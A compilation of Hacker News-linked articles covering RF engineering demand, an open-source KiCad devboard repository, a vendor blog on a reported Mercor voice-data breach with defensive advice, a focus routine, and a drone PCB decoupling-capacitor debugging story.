This is the one I see most directly in my work, and it *feels* the most dramatic. In 2015, roughly [260 spacecraft were launched](https://ourworldindata.org/grapher/yearly-number-of-objects-launched-into-outer-space) into space globally. By 2024, that number hit approximately 2,695. A 10x increase in under a decade. The overwhelming majority of that growth came from commercial constellations, with SpaceX's Starlink deploying over 1,500 satellites in 2023 alone.

Every single one of those satellites needs RF hardware. Starlink operates in Ku-band for user links and Ka-band for gateways, with V-band planned for Starlink V2. Kuiper and OneWeb follow similar architectures in Ka-band. Each spacecraft carries transceivers, antennas, filters, and amplifiers — and each ground station that talks to them needs the same. The amount of RF hardware per spacecraft adds up fast, and the launch cadence isn't slowing down.

The money tells the same story. The global space economy hit a record [$613 billion in 2024](https://www.spacefoundation.org/2025/07/22/the-space-report-2025-q2/), with commercial making up roughly 78% of that. The [space based RF market](https://www.openpr.com/news/4298716/space-based-rf-and-microwave-technology-market-size-share) alone was valued at $18.6 billion and is projected to nearly double by 2033.

And it's not just commercial. On the defense side, the Space Development Agency is building the [Proliferated Warfighter Space Architecture](https://payloadspace.com/ndsa-explainer/) — a LEO constellation targeting 500+ satellites. Only a few dozen are on orbit today, but nearly $35 billion has been committed through 2029. Even with the growing push toward optical links, these spacecraft still carry RF communications hardware and telemetry payloads, and that is unlikely to change anytime soon.

### 5G Wide Adoption

I think 5G's impact on RF demand is genuinely understated. A typical 4G base station has 2 or 4 transmit-receive chains. A 5G MIMO radio integrates anywhere from 64 to 256. That's a 16x or greater increase in the power amplifiers, low-noise amplifiers, and antenna switches needed per installation. Multiply that across [642 operators and 374 commercial launches](https://gsacom.com/technology/5g/), and you start to see why the [RF component market](https://www.mordorintelligence.com/industry-reports/rf-components-market) is pushing toward $50 billion with no signs of slowing.

The design challenges make it worse. Millimeter wave frequencies introduce path loss that demands arrays built to millimeter-scale manufacturing tolerances. And thermal management (e.g., dissipating 300+ watts from tower-mounted hardware with passive cooling) isn't something you can solve reliably in software.
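The millimeter wave penalty falls straight out of the Friis equation: with fixed-gain antennas, free-space path loss grows by 20 dB per decade of carrier frequency. A quick check of the jump from a mid-band 5G carrier to mmWave (band choices here are illustrative):

```python
import math

# Friis free-space loss scales as 20*log10(f), so moving a fixed-gain link
# from 3.5 GHz (mid-band) to 28 GHz (mmWave) at the same range costs:
penalty_db = 20 * math.log10(28e9 / 3.5e9)
print(f"{penalty_db:.1f} dB extra path loss at 28 GHz vs 3.5 GHz")
```

Roughly 18 dB, which is the gap those large beamforming arrays exist to claw back.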

### 6G Is Already In The Works

It's early, but 6G isn't vaporware. [3GPP](https://www.3gpp.org/specifications-technologies/releases/release-20) has been actively working on 6G study items since 2024, with first specifications targeted for late 2028 and commercial deployments expected around 2030. The EU, South Korea, and major telecom players like Ericsson, Nokia, and Samsung are all investing heavily into this research.

The RF challenges are genuinely new territory. Sub-terahertz frequencies and [integrated sensing and communication](https://www.ericsson.com/en/blog/2024/6/integrated-sensing-and-communication) (ISAC), which 3GPP officially scoped into 6G in the middle of last year, push well beyond what current design tools can handle. Worth noting though — the original vision for sub-THz has already been [scaled back](https://the-mobile-network.com/2026/04/6g-reality-check-and-update/) from outdoor cellular to mostly short-range indoor use cases like data centers and factories. But even with a narrower scope, all of this research eventually has to become hardware, and the people who know how to do that are already stretched thin.

### The "Drivers" That Don't Get Headlines

Space and cellular seem to dominate the conversation, but there are quieter contributors that, I think, make this trend durable rather than cyclical.

Automotive radar is a sneaky one. The EU now [mandates automatic emergency braking](https://spectrum.ieee.org/europe-mandates-automatic-emergency-braking) in all new vehicles and, while the regulation is *technically* sensor-agnostic, most implementations rely on radar. Every new car with adaptive cruise control or collision avoidance has RF hardware running on board. That market alone is projected to hit $7+ billion this year. Then there's Wi-Fi 7, operating across three bands simultaneously, and the ever expanding IoT landscape with over 21 billion connected devices as of 2025. Anything that communicates wirelessly needs RF work behind it, and that list just keeps growing.

## The Talent Shortage

What makes this an interesting pattern is that the supply side is genuinely broken. [IEEE survey data](https://k2staffinginc.com/electrical-engineering-talent-shortages-how-recruiters-bridge-the-gap/) shows 73% of EE employers can't fill positions within six months, up from 45% five years ago. [EE Times](https://www.eetimes.com/engineer-demand-exposes-talent-gap-in-rf-development/) has reported specifically on the RF talent gap and its growing demand.

And it's not just direct competition for RF roles either. RF and semiconductor careers often pull from the same shrinking pool of EE graduates, and right now the semiconductor side is in a hiring frenzy of its own. The CHIPS Act has poured billions into domestic fab expansion, AI chip demand is exploding, and the semiconductor industry is projecting a [67,000 worker shortfall by 2030](https://www.semiconductors.org/chipping-away-assessing-and-addressing-the-labor-market-gap-facing-the-u-s-semiconductor-industry/). All of that competes directly with RF employers for the same talent. When everyone is fighting over the same small group of EE grads, RF companies, which tend to be smaller and less visible than the big chip fabs, often lose out.

Salaries reinforce this. Average RF engineer comp is pushing past $130K, with top-end design positions listing above $200K.

The real signal to me is what companies are doing about it. [Mini-Circuits](https://blog.minicircuits.com/bridging-the-gap-between-the-university-and-the-rf-industry/) and Keysight are investing directly in university partnerships because they can't wait for the academic pipeline to refresh itself. Baylor launched a new Graduate Certificate in Microwave/RF Engineering in 2024, one of the few new programs I've seen pop up, but I imagine it won't be the last. When industry starts building its own talent pipeline, that tells me the shortage isn't a blip.

## Looking Forward

I don't want to oversell this. I don't think RF is going to become a field with an insane growth pattern. [The BLS](https://www.bls.gov/ooh/architecture-and-engineering/electrical-and-electronics-engineers.htm) projects 7% growth for EE broadly; faster than average, sure, but not a hockey stick. Still, the demand is real, it's coming from multiple directions at once, and the supply is genuinely constrained.

My own path is a small version of this story. I came in as a software engineer and had to learn RF on the job because there wasn't someone else to hand it off to. I say this as someone who made that transition: you *absolutely* can learn enough RF to be effective in your role, and I'd encourage anyone in aerospace or wireless to do it (honestly it's a fun niche to get into anyway). But there's a difference between understanding link budgets and SDR anomalies versus designing a phased array from scratch. The latter takes years of dedicated focus. The underlying physics (electromagnetics, thermodynamics, materials science, manufacturing tolerances) don't reduce to algorithms. You have to build intuition for it, and that's not something you can shortcut.

I may one day expand on learning this stuff on the job and on the fly, but I do want to shout out [PySDR](https://pysdr.org/). It's a free resource built exactly for software engineers. It uses Python as the bridge between hardware and software concepts, assumes no prior RF knowledge, and doesn't spend a ton of time over-explaining the math.

The people who stuck with RF through the lean years are now some of the most sought-after engineers I've come across. And for anyone trying to figure out where to focus, either as a primary discipline or as a secondary skill set like it was for me, I think RF is worth a serious look right now.

* * *

**Who Am I?**

Anthony Templeton is a software engineer passionate about high-performance computing and aerospace applications. You can connect with me on [LinkedIn](https://www.linkedin.com/in/anthony-f-templeton/) or check out more of my work on [GitHub](https://github.com/ATTron).

---

## [HN-TITLE] 10. Easyduino: Open Source PCB Devboards for KiCad

- **Source**: [https://github.com/Hanqaqa/Easyduino](https://github.com/Hanqaqa/Easyduino)
- **Site**: GitHub
- **Submitter**: Hanqaqa (Hacker News)
- **Submitted**: 2026-04-27 17:45 UTC (Hacker News)
- **HN activity**: 179 points · [27 comments](https://news.ycombinator.com/item?id=47924813)
- **Length**: 789 words (~4 min read)
- **Language**: en

## Easyduino: Repository of Open Source PCB Devboards for KiCad


The Easyduino project is an effort to make it easy to dive into the PCB designs of the most popular microcontroller devboards like **Arduino, ESP32, Raspberry Pico and STM32 Bluepill** (more to come!), using the free and open-source [KiCad](https://www.kicad.org/) and adhering to best practices across the PCB and KiCad ecosystem. It also adds the much-needed USB-C support!

[![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Isometric%20Photos/Collage_easyduino.jpg)](https://github.com/Hanqaqa/Easyduino/blob/master/Assets/Isometric%20Photos/Collage_easyduino.jpg)

The project was born out of the necessity to unify the wide variety of software, languages and conventions used in the most popular devboards. For example, the Arduino Uno was developed in 2010 in Italy using Eagle. The ESP32 devboard was developed in 2016 in China using Altium. The Raspberry Pi Pico 2040 was developed around 2021 in the U.K. using KiCad and Altium...

## Available Development Boards


[Easyduino UNO](https://github.com/Hanqaqa/Easyduino/tree/master/Atmega328p%20Arduino%20Uno) [Easyduino Nano](https://github.com/Hanqaqa/Easyduino/tree/master/Atmega328p%20Arduino%20Nano) [Easyduino ESP32](https://github.com/Hanqaqa/Easyduino/tree/master/ESP32) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/UNO.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/Atmega328p%20Arduino%20Uno) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/Nano.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/Atmega328p%20Arduino%20Nano) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/ESP32.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/ESP32)

[Easyduino ESP32 S3](https://github.com/Hanqaqa/Easyduino/tree/master/ESP32S3) [Easyduino Pi Pico](https://github.com/Hanqaqa/Easyduino/tree/master/Raspberry%20Pi%20Pico%202040) [Easyduino Bluepill STM32F103](https://github.com/Hanqaqa/Easyduino/tree/master/STM32F103%20Bluepill) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/ESP32S3.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/ESP32S3) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/Raspberry.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/Raspberry%20Pi%20Pico%202040) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/STM32F103.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/STM32F103%20Bluepill)

In all of the boards, the outline, pinout, layout and components aim to replicate the originals, with varying levels of success.

Some boards, like the Raspberry Pi Pico, use 01005 components which are too expensive for the manufacturer to integrate in the PCB assembly line. Some other components, like the original Arduino UNO's USB-to-serial converter, an Atmega16u2, were hard to come by during the development of this project (~January 2023), so more readily available options were chosen. All the differences from the original boards are explained in a readme file inside each project's folder.

4 layers of copper have been used in all projects to simplify the wiring. Specifically the [JLC04161H-7628](https://jlcpcb.com/impedance) stackup.

The PCB constraints of the manufacturer JLCPCB are explained [here](https://github.com/Hanqaqa/Easyduino/tree/master/Assets/JLCPCB%20Constraints)

## Structure of each project


Each project consists of:

- Main KiCad files (.kicad\_pro, .kicad\_sch...)
- A readme explaining the specifics of that project
- xxx.pretty or xxxlibraries folder, which contains the non-standard footprints or schematic parts used in the project (some projects, such as the Arduino UNO, use only standard libraries, so these folders don't exist)
- The **Outputs** folder: All the data produced by the KiCad Jobset like Gerbers, STEPs, PDFs, ERC, BOM, CPLs...
- The ***ProductionFiles*** folder which includes files such as:
  
  - BOM: This folder contains both the list of components and the Centroid File in JLCPCB-readable format
  - ***Datasheets***: all the datasheets of the main components used in the project. Datasheets of easily replaceable components such as Resistors, Capacitors and LEDs are not given
  - Gerbers: A zip file with all of the manufacturing gerber files such as Copper/Mask/Silkscreen layers
  - PDFs: PDF and PNG files of the Schematic and PCB
  - Photos: Some photos of the manufactured PCB as well as some renders

## Using the project


1. Install the latest version of [KiCad](https://www.kicad.org/)
2. If you already have KiCad installed, click the `<> Code` button at the top right of this GitHub page, click `Download ZIP`, and extract the files to your desired folder. If you know how to use git, clone the repository instead
3. Double click on the xxx.kicad\_pro file inside any project and KiCad will start

This project was developed using KiCad v8.0.0, but has been updated and tested with KiCad v10, including the creation of Jobsets, which massively simplifies creating gerbers and BOMs.

Since this is a collection of projects, the new KiCad v10 Git utilities don't work properly with each project, forcing you to git add the whole project if you want to make a change.

If you'd rather just consult the schematics or the gerbers, they are located inside the **ProductionFiles** folder of each project, inside the **PDFs** and **Gerber** folders.

## Contributing


If you spot any mistakes inside any of the projects, either open an issue and I will try to correct it, or fork the repository and submit the correction.

If you plan on developing any other development boards and wish to merge them into the project, please try to use the same style and conventions as the original ones in the schematic: positive voltages facing up, text clearly readable, a references page, and a similar folder structure.

To do list:

- Order and test the v1.1 RP2040 board. (In v1.0 I mixed some pins in the Flash and couldn't boot up). Ordered. Awaiting arrival.
- Order and test the v1.1 ESP32S3 board. (In v1.0 I forgot to add PullUp and PullDown in RST and SUSPEND CP2102). Ordered. Awaiting arrival.
- Start developing a nRF52840 Dongle and RP2350A.
- Investigate other possible microcontrollers/SOCs to implement.

## Acknowledgments


Thanks to [winsrrow](https://github.com/winsrrow) for providing KiCad tips and designing from the ground up the v1.1 RP2040 board.

## Licensing


This project is distributed under the [**CERN Open Hardware Licence Version 2 - Permissive**](https://github.com/Hanqaqa/Easyduino/blob/master/License.txt), which means **you are free to use any or all parts of this project with or without disclosing the source**, even for commercial projects, as long as you include a copy of the CERN OHLv2 Permissive Licence.

---

## [HN-TITLE] 11. 4TB of voice samples just stolen from 40k AI contractors at Mercor

- **Source**: [https://app.oravys.com/blog/mercor-breach-2026](https://app.oravys.com/blog/mercor-breach-2026)
- **Site**: ORAVYS
- **Author**: ORAVYS
- **Submitted**: 2026-04-27 09:57 UTC (Hacker News)
- **HN activity**: 456 points · [168 comments](https://news.ycombinator.com/item?id=47919630)
- **Length**: 1.3K words (~6 min read)
- **Language**: en

[← ORAVYS](https://app.oravys.com/site)

Forensic intelligence // Breach analysis

## 4TB of voice samples were just stolen from 40,000 AI contractors. Here is how to verify if yours is being weaponized.

By the ORAVYS forensic desk · Published April 24, 2026 · ~7 min read

On April 4, 2026, the extortion group Lapsus$ posted Mercor on its leak site. The dump is reported at roughly four terabytes and bundles a payload that breach analysts have been warning about for two years: voice biometrics paired with the same person's government-issued identity document. According to the leaked sample index, the archive covers more than 40,000 contractors who signed up to label data, record reading passages, and run through verification calls for AI training.

Five contractor lawsuits were filed within ten days of the post. The plaintiffs argue that the company collected voice prints under a "training data" framing without making clear they were also a permanent biometric identifier. The lawsuits matter, but the people whose voices were already exfiltrated have a more immediate question. What does an attacker actually do with thirty seconds of someone's clean read voice plus a scan of their driver's license?

## Why this breach is different

Most voice leaks in the last decade fell into one of two buckets. Either a call center got popped and recordings were stolen with no easy way to map them back to identity. Or an ID-document broker leaked driver's licenses and selfies without any audio attached. Mercor merged both columns. The contractor onboarding pipeline asked for a passport or driver's license scan, then a webcam selfie, then a sit-down voice recording reading scripted prompts in a quiet room. That sequence, in one row of one database, is exactly what a synthetic voice cloning service needs as input.

The Wall Street Journal reported in February 2026 that high-quality voice cloning now requires roughly fifteen seconds of clean reference audio for tools available off the shelf. The Mercor recordings are reported to average two to five minutes of studio-clean speech per contractor. That is far past the threshold. Pair it with a verified ID document and the attacker has both the clone and the credential needed to put the clone to work.

## What attackers can now do with stolen voice data

The threat models below are not speculative. Each is a documented technique already used in the wild before this breach.

- **Bank verification bypass.** Several US and UK banks still treat voiceprint matching as one of two factors. A clone of the account holder reading a challenge phrase clears the audio gate, leaving only a knowledge question that often comes from the same leaked dataset.
- **Vishing the victim's employer.** Calling HR or finance pretending to be the employee to redirect payroll, request a wire, or unlock a workstation. The Krebs on Security archive lists more than two dozen confirmed cases since 2023.
- **Deepfake video calls in the Hong Kong Arup template.** In 2024 a finance worker at Arup wired roughly 25 million dollars after a multi-person deepfake video call. The voices and faces had been built from public footage. Mercor leaked something better than public footage: studio audio plus a verified ID.
- **Insurance claim fraud.** Pindrop reported a 475 percent year-over-year increase in synthetic voice attacks against insurance call centers across 2025. Auto, life, and disability claims are the prime targets because they are settled by phone.
- **Romance and grandparent scams targeting family members.** The FBI Internet Crime Complaint Center logged 2.3 billion dollars in losses for victims aged 60 and over in calendar year 2026. The single fastest-growing category was emergency impersonation calls, where the synthetic voice claims to be a relative in trouble.

## How to check if your voice is being misused

If you ever uploaded a voice sample to Mercor, or to any of the other AI training brokers that operated through 2025, treat your voice the way you would treat a leaked password. You cannot rotate it, but you can change what it unlocks. Here is the short list.

1. **Self-audit your public audio footprint.** Search YouTube, podcast directories, and old Zoom recordings for samples of your voice that are publicly indexable. Take down what you can. The less reference audio is in the open, the less robust an attacker's clone.
2. **Set up a verbal codeword with family and finance contacts.** Pick a phrase that has never been spoken on a recording and never typed in chat. Brief the people who handle money on your behalf. If a call ever asks for a transfer, the codeword is mandatory.
3. **Rotate where voiceprints are still in use.** Google Voice Match, Amazon Alexa Voice ID, Apple personal voice, and any banking voiceprint enrollment can be deleted and replaced. Do that now, ideally from a new recording in a different acoustic environment than the leaked sample.
4. **Tell your bank to disable voiceprint as a verification factor.** Ask in writing for multi-factor authentication that combines an app token or hardware key with a knowledge factor. Many banks let you opt out of voice as a primary factor; few of them advertise it.
5. **Run suspicious recordings through a forensic scanner.** If you receive an audio file or voicemail that claims to be from someone you know and asks for money, access, or urgency, run it through a deepfake detector before acting. ORAVYS offers a free check for the first three samples submitted by breach victims (see the offer below).

## The forensic checklist that experts use

When a sample lands on a forensic analyst's desk, the following artifacts are the first pass. Each is something a synthetic voice tends to get slightly wrong, even when the perceptual quality is high.

- **Codec mismatch.** The audio claims to come from a phone call but the spectral signature does not match any known telephony codec.
- **Breath patterns.** Real speakers inhale at predictable points dictated by phrase length and lung capacity. Synthetic voices often skip breaths or insert them at the wrong syllabic boundary.
- **Micro-jitter.** Natural vocal folds vibrate with small irregularities. Generated audio is often too clean at the millisecond level.
- **Formant trajectory.** Vowel transitions follow physical articulator paths in a real mouth. Cloned voices sometimes take impossible shortcuts between formants.
- **Room acoustics inconsistency.** The reverb signature should be identical from the start of the file to the end. Generated audio is often dry while the splice context is reverberant.
- **Prosody flatness.** Synthetic speech often has narrower pitch and energy variance than the same speaker would have in real conditions.
- **Speech rate stability.** Real humans speed up and slow down with content. Generated speech tends to hold a metronomic rate across long passages.
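The last two checks on that list are, at heart, variance tests. As a toy illustration (this is not ORAVYS's pipeline, just the underlying idea, with synthetic signals standing in for speech), a prosody-flatness score can be as simple as the coefficient of variation of short-time frame energy:

```python
import math
import statistics

def frame_energies(samples, frame_len=400):
    """Short-time energy of each non-overlapping frame."""
    return [
        sum(s * s for s in samples[i:i + frame_len]) / frame_len
        for i in range(0, len(samples) - frame_len + 1, frame_len)
    ]

def prosody_flatness(samples, frame_len=400):
    """Coefficient of variation of frame energy: lower means flatter delivery."""
    e = frame_energies(samples, frame_len)
    mean = statistics.mean(e)
    return statistics.stdev(e) / mean if mean > 0 else 0.0

# Toy signals: a "natural" tone whose loudness swells and fades,
# vs. a "synthetic" one held at metronomic constant amplitude.
rate = 8000
t = [i / rate for i in range(rate)]  # one second of samples
natural = [math.sin(2 * math.pi * 120 * x)
           * (0.5 + 0.5 * math.sin(2 * math.pi * 2 * x)) for x in t]
flat = [0.75 * math.sin(2 * math.pi * 120 * x) for x in t]

print(prosody_flatness(natural) > prosody_flatness(flat))  # True
```

A real detector would work on pitch and energy contours of actual speech and combine many such scores, but the intuition is the same: generated audio tends to sit suspiciously close to its own average.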

## What ORAVYS does specifically

- More than 3,000 forensic engines run in parallel on every submitted sample, covering signal, prosody, articulation, codec, and provenance domains.
- AudioSeal watermark detection flags files generated by major commercial voice models when the watermark is preserved, giving a deterministic positive when present.
- An anti-spoofing module trained against the ASVspoof public benchmarks scores the likelihood that a sample was synthesized rather than recorded.
- Biometric processing is GDPR compliant. Audio is never used to train commercial models without explicit consent and is purged on a defined retention schedule.

### Free verification for Mercor breach victims

If you were a Mercor contractor and you believe your voice may already be in circulation, ORAVYS will analyze the first three suspect samples free of charge. You will receive a forensic report covering watermark detection, anti-spoofing score, and the artifact checklist above. No card required, no quota gate.

[Run a forensic check →](https://app.oravys.com/deepfake-detection)

Sources cited in this article: Lapsus$ leak site index (April 2026), Wall Street Journal voice cloning report (February 2026), Pindrop Voice Intelligence Report 2025, FBI IC3 Elder Fraud Report 2026, Krebs on Security archives. Lawsuit references are matters of public record. ORAVYS does not host or redistribute the leaked dataset and does not accept it as input.

---

## [HN-TITLE] 12. Men who stare at walls

- **Source**: [https://www.alexselimov.com/posts/men\_who\_stare\_at\_walls/](https://www.alexselimov.com/posts/men_who_stare_at_walls/)
- **Site**: Alex Selimov
- **Author**: Alex Selimov
- **Published**: 2026-04-27
- **HN activity**: 465 points · [209 comments](https://news.ycombinator.com/item?id=47920074)
- **Length**: 584 words (~3 min read)
- **Language**: en-US

![Edited image from Men Who Stare At Goats with George Clooney staring at wall instead of a goat](https://www.alexselimov.com/posts/men_who_stare_at_walls/cover.webp)

I came across [a video by Simple Lucas](https://www.youtube.com/watch?v=NZD5IFpyDcE&pp=ygUgc3RhcmluZyBhdCB3YWxsIGZvciBwcm9kdWN0aXZpdHk%3D) describing a routine to improve focus and productivity. The routine was basically:

1. Don’t use any screens/entertainment when trying to focus on work.
2. When you start to feel mentally drained, sit and stare at a wall for x minutes to recover focus.

I’ve been trying it, and it’s a very effective (but hard) routine.

## The problem

The core problem is that most people are, by default, in a state of information overload. A paper published in 2012 showed that in 2008 the average person was receiving 34 GB of information daily, with a daily information exposure growth rate of about 5.4% per year [1](#fn:1). Extrapolating that trend, we would be at about 87 GB worth of data today. This calculation includes audio, visual, and text data and incorporates quality into the measurement, i.e. 10 minutes of HD video carries more information than 10 minutes of 480p video. It’s unclear to me exactly how the quality impacts things, but regardless it is obvious that we are all being drowned in a sea of information.
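A quick back-of-the-envelope check of that extrapolation, assuming simple annual compounding from 2008 to today:

```python
# 34 GB/day measured in 2008, growing ~5.4% per year, compounded to 2026.
daily_gb_2008 = 34
growth = 1.054
years = 2026 - 2008
today = daily_gb_2008 * growth ** years
print(f"{today:.0f} GB/day")  # ≈ 88 GB/day, in line with the ~87 GB figure
```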

I certainly go through periods of “brain fog” and lack of focus/motivation. These periods usually go something like:

1. Get a bad night of sleep (up late for an event, kids keep waking me up).
2. Wake up very tired so consume large amounts of caffeine.
3. Have trouble focusing after 2/3 cups so use media while working to dull the pain (music/podcasts) or take more “breaks” (reading hackernews).
4. Stay up late because I’m wired on caffeine and dopamine from scrolling.
5. Go back to 2.

I find these cycles very hard to break out of when I’m in them. The media consumption constitutes a small dopamine hit. Large numbers of small hits put you in a hole, where you need even more/stronger hits to feel good.

## Disconnecting

The obvious solution is to disconnect from scrolling, but that doesn’t overcome the biggest issue. When I’m in this “brain fog” cycle (and sometimes outside of it), I will find that around 1 or 2 pm I hit a wall. My head will start hurting, my motivation will be trash, and my productivity significantly degrades. My first instinct is to go for more coffee. That usually lets me keep working, but at a slow/painful pace. While looking for focusing strategies I came across the life-changing solution…

## Stare at a Wall!

After watching Simple Lucas’ experience, I decided to try it when I hit my focus wall.

It worked.

In my attempts, I combined wall staring with a few other concepts I had heard about. First was activating the parasympathetic nervous system by staring at the wall “out-of-focus” and using peripheral vision. Second was incorporating mind blanking which means trying to think of nothing. I tried intervals of 5-10 minutes and when I was done, my focus was back!

What I didn’t expect was how difficult it would be. Sitting for 5-10 minutes staring at a wall without thinking of anything is hard! I relate it somewhat to the feeling I have with working out. Oftentimes I want to avoid it because it’s hard, but I’m always happy when I push through and complete it. It was the exact same experience with the wall staring.

So far I’ve been feeling significant focus/productivity improvements. I’ve also been using some other strategies to improve focus, which I’ll be talking about in a future post. I plan to continue this routine and will update to see how much it has impacted productivity/focus. Thanks for reading!

* * *

1. [https://ijoc.org/index.php/ijoc/article/view/1566](https://ijoc.org/index.php/ijoc/article/view/1566) [↩︎](#fnref:1)

---

## [HN-TITLE] 13. How I learned what a decoupling capacitor is for, the hard way

- **Source**: [https://nbelakovski.substack.com/p/how-i-learned-what-a-decoupling-capacitor](https://nbelakovski.substack.com/p/how-i-learned-what-a-decoupling-capacitor)
- **Site**: Nickolai’s Substack
- **Author**: Nickolai Belakovski
- **Published**: 2026-04-25
- **HN activity**: 36 points · [6 comments](https://news.ycombinator.com/item?id=47905208)
- **Length**: 906 words (~4 min read)
- **Language**: en

I was very excited to get the latest version of my PCB from the manufacturer. This new version had a magnetometer on it, so that I could more accurately track the yaw angle of my drone.

[![](https://substackcdn.com/image/fetch/$s_!qV1Y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e0ee63c-0221-4885-b215-d8c2405b9c9a_3008x2329.jpeg)](https://substackcdn.com/image/fetch/$s_!qV1Y!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e0ee63c-0221-4885-b215-d8c2405b9c9a_3008x2329.jpeg)

The first thing I did was start to program it over USB. I added code for initializing and reading the magnetometer, and I got back some data that seemed correct for the X and Y axes, but the Z axis would read a constant value. I did some light debugging, and learned, among other things, that the Z axis has slightly different internal circuitry, but eventually I decided to put a pin in it and focus on other things.

Eventually I had to plug my drone into the battery that would power it in flight, and all of a sudden the magnetometer stopped working completely. I pivoted back to debugging it, but nothing worked. I tried resetting the board, and I added code to automatically reset and reinitialize the magnetometer if it hadn’t been heard from for a while, but no matter what I tried, it stayed dead while the battery was plugged in.

When I would unplug the battery and plug the USB back in, the magnetometer would recover and work just like it had before. So right away I have to start thinking about what the 3.3V line which powers the magnetometer looks like under USB vs battery.

[![](https://substackcdn.com/image/fetch/$s_!dzaA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1fdad08c-fca6-4c68-92fd-93b50f74bfe3_3008x1955.jpeg)](https://substackcdn.com/image/fetch/$s_!dzaA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1fdad08c-fca6-4c68-92fd-93b50f74bfe3_3008x1955.jpeg)

A Qwiic connector gives me easy access to the 3.3V bus. Here you can see it’s reading a pretty steady 3.3V

[![](https://substackcdn.com/image/fetch/$s_!EhRI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39ac8edd-23ea-4a97-a538-ce1ba0e68810_3008x2208.jpeg)](https://substackcdn.com/image/fetch/$s_!EhRI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39ac8edd-23ea-4a97-a538-ce1ba0e68810_3008x2208.jpeg)

Under battery it similarly reads about 3.3V, and the reading on the multimeter is steady

So does that mean it’s not an issue with the 3.3V bus? Well, not exactly. The multimeter is going to give you a bulk reading, but it’s possible that the line is noisy even though the average reading is 3.3V. The way we get to 3.3V from the initial 5V/8V is through a [SY8113IADC](https://atta.szlcsc.com/upload/public/pdf/source/20200117/C479075_749CE19A0276D274B25CFED6D9E6F64F.pdf) voltage regulator. This is a modern switching regulator which is very efficient, but it achieves that efficiency by, you guessed it, rapidly switching the input supply on and off to effectively drop it down to the desired voltage (as opposed to the older kind of regulator which would just dissipate the energy as heat).

This switching causes ripples in the voltage line, and if we hook up an oscilloscope to the line we should be able to see these ripples in detail.

[![](https://substackcdn.com/image/fetch/$s_!uEBh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb029c2d9-e430-4b53-bec1-8286cb22ddc8_3008x2105.jpeg)](https://substackcdn.com/image/fetch/$s_!uEBh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb029c2d9-e430-4b53-bec1-8286cb22ddc8_3008x2105.jpeg)

Under USB power, the 3.3V line ranges from 3.14V to 3.7V. The BMM150 magnetometer is rated for up to 3.6V.

[![](https://substackcdn.com/image/fetch/$s_!4RXf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb278eab3-c943-46b8-b180-7b3b0d4752d4_3008x2171.jpeg)](https://substackcdn.com/image/fetch/$s_!4RXf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb278eab3-c943-46b8-b180-7b3b0d4752d4_3008x2171.jpeg)

Under battery power, the 3.3V line ranges from 2.74V to 4.34V! This must be why the magnetometer simply won’t work on battery power.

To get this magnetometer to work on this board, there’s sadly nothing I can really do. At best I could try to solder some tiny wires to the vias on the board near the magnetometer and use those to attach a capacitor between 3.3V and GND as close to the magnetometer as possible but a) it’s likely I’d cause some damage in trying to accomplish this and b) it seems like it would be a very fragile solution.

Fortunately since I had a Qwiic connector on the board, I was able to purchase a magnetometer with a Qwiic interface and attach it. I lose out a little bit since the BMM150 on the board directly interfaces with the BMI270 IMU and synchronizes its readings with the gyroscope/accelerometer readings, but this isn’t critical for what I’m trying to do.

So we can’t exactly fix this, but we can take this as an opportunity to see how a decoupling capacitor cleans up a noisy power signal. The general idea with a decoupling capacitor is that it absorbs high frequency noise in the power line. Take another look at the pictures of the ripples above and notice the “M: 20ns” in the top left corner. This signifies that each vertical dotted line is 20ns apart, so the ripple you see has a frequency of something like 50MHz. This is the sort of noise that a small capacitor right next to the voltage and ground pins of an IC like the BMM150 is supposed to handle, if you put one into your design of course 😅.
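That shunting behavior can be sketched numerically. A minimal first-order model in Python, assuming an illustrative 100 nF cap and a 1 Ω supply source impedance (neither value is measured from this board, and real layouts add trace inductance this ignores):

```python
import math

def ripple_attenuation_db(f_hz, cap_f, source_ohms):
    """Treat the decoupling cap as the bottom leg of a voltage divider:
    ripple arrives through the supply's source impedance and the cap
    shunts it to ground. |Z_C| = 1 / (2*pi*f*C)."""
    z_c = 1.0 / (2 * math.pi * f_hz * cap_f)
    return 20 * math.log10(z_c / math.hypot(source_ohms, z_c))

# ~50 MHz ripple (from the scope's 20 ns/div trace) vs a 100 nF cap
att = ripple_attenuation_db(50e6, 100e-9, 1.0)  # roughly -30 dB
```

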